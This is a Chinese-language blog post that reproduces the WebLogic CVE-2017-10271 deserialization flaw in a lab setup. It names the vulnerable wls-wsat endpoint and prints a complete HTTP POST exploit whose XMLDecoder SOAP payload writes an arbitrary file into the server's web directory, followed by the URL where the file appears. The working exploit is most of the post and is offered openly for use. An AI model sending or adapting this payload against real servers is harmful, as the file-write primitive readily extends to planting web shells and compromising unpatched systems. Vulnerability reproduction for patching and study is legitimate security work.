Weblogic(CVE-2017-10271)漏洞复现 附EXP

漏洞预警:http://www.hackxc.cc/?post=235


漏洞复现:

测试环境:windows 2003      weblogic 10.3.6.0版本      jdk 6.0


首先要部署weblogic ,在这里我就不掩饰了,可能有的小伙伴不会,下面附上部署教程

WebLogic安装和配置:http://www.360doc.com/content/15/0918/15/21514996_499925417.shtml


启动服务之后访问页面:http://域名:默认weblogic端口/wls-wsat/CoordinatorPortType

如果存在以下内容则说明可能存在漏洞

开启burp访问此页面时,抓包,发送到Repeater模块

EXP如下:

POST //wls-wsat/CoordinatorPortType HTTP/1.0
Host: http://192.168.174.130:7001/
Accept: */*
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Accept-Language: zh-cn
UA-CPU: x86
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Pragma: no-cache
Content-Length: 553

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/2.txt</string><void method="println">
<string>Weblogic

By:www.hackxc.cc</string></void><void method="close"/>
</object>
</java>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

直接点击go,上传成功后地址为:http://192.168.174.130:7001/wls-wsat/2.txt



后续:

weblogic默认端口:7001

默认路径:servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/2.txt

分享到:更多

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(0)